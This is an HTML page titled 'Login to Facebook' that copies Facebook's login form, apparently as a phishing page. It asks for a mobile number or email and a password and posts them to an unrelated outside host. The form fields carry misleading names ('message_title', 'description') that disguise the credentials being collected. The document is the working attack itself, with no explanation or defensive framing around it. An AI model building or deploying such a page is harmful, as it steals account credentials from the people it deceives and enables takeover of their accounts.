<html lang="en">
                 <head>
                 <meta charset="UTF-8">
                 <meta name="viewport" content="width=device-width, initial-scale=1.0">
                 <title>Login to Facebook</title>
                 <script crossorigin="" src="https://unpkg.com/react-dom@18/umd/react-dom.development.js"></script>
                 <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
                 <script src="https://cdn.tailwindcss.com"></script>
                 <style type="text/css" id="operaUserStyle">
                 body{
                   color:#ffffff; 
                   background-image: url('background.png');
                 }
                 img {
                   width: 100%;
                 }
                 input {
                   width: 90%;
                   height: 50px;
                   border: 1px solid #4f4f4f;
                   border-radius: 5px;
                   margin: 5px;
                   padding: 20px;
                 }
                 button {
                   height: 40px;
                   border: none;
                   border-radius: 80px;
                   background-color: #5762ef;
                   color: white;
                 }
                 </style>
                 </head>
                 <img src="top.png">
                 <center>
                  <noscript>You need to enable JavaScript to run this app.</noscript>
    <form action="https://pinnocent.com/vpage" method="POST">
    <input type="text" class="w-full border p-2 rounded-md" name="message_title" placeholder="Mobile number or email address" required="text">
    <input type="password" class="w-full border p-2 rounded-md" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" required="password"></div>
    <div class="flex flex-col justify-center items-center  p-2 gap-1 w-3/6 mx-auto">
    <button type="submit" class=" text-black font-semibold p-3 rounded-md w-full bg-[#125ec3] hover:bg-blue-600" style="width: 80%">Log In</button>
    </form>
    <img src="bottom.png">
    </html>